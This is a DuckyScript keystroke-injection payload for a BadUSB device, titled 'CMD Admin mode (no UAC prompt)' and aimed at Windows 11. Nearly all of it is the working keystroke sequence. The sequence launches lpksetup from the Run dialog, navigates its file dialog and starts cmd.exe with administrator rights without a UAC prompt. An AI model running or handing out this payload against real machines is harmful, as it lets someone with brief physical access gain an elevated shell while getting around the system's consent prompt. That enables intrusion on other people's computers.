REM ########################################################################################
REM |                                                                                      |
REM |                 ███▄ ▄███▓ ██▓ ██▓ ██▀███   ▄▄▄      ▄▄▄       ██ ▄█▀                |
REM |                ▓██▒▀█▀ ██▒▓██▒▓██▒▓██ ▒ ██▒▒████▄   ▒████▄     ██▄█▒                 |
REM |                ▓██    ▓██░▒██▒▒██▒▓██ ░▄█ ▒▒██  ▀█▄ ▒██  ▀█▄  ▓███▄░                 |
REM |                ▒██    ▒██ ░██░░██░▒██▀▀█▄  ░██▄▄▄▄██░██▄▄▄▄██ ▓██ █▄                 |
REM |                ▒██▒   ░██▒░██░░██░░██▓ ▒██▒ ▓█   ▓██▒▓█   ▓██▒▒██▒ █▄                |
REM |                ░ ▒░   ░  ░░▓  ░▓  ░ ▒▓ ░▒▓░ ▒▒   ▓▒█░▒▒   ▓▒█░▒ ▒▒ ▓▒                |
REM |                ░  ░      ░ ▒ ░ ▒ ░  ░▒ ░ ▒░  ▒   ▒▒ ░ ▒   ▒▒ ░░ ░▒ ▒░                |
REM |                ░      ░    ▒ ░ ▒ ░  ░░   ░   ░   ▒    ░   ▒   ░ ░░ ░                 |
REM |                       ░    ░   ░     ░           ░  ░     ░  ░░  ░                   |
REM |                                                                                      |
REM | Title        : CMD Admin mode (no UAC prompt)                                        |
REM | Author       : Miiraak                                                               |
REM | Version      : v1.0                                                                  |
REM | Category     : Execute                                                               |
REM | Target       : Windows 11                                                            |
REM |                                                                                      |
REM ########################################################################################

REM Requirements:
REM     - Admin Rights

REM Description:
REM     - Ouvre un cmd en administratateur

DEFAULT_DELAY 300
DELAY 1000
GUI r
STRING lpksetup
ENTER
ENTER
TAB
ENTER
ALT TAB
ALT TAB
UP
UP
MENU
UP
ENTER
TAB
TAB
TAB
TAB
TAB
RIGHT
RIGHT
RIGHT
RIGHT
RIGHT
TAB
TAB
TAB
ENTER
TAB
TAB
TAB
TAB
TAB
ENTER
STRING cmd.exe
ENTER
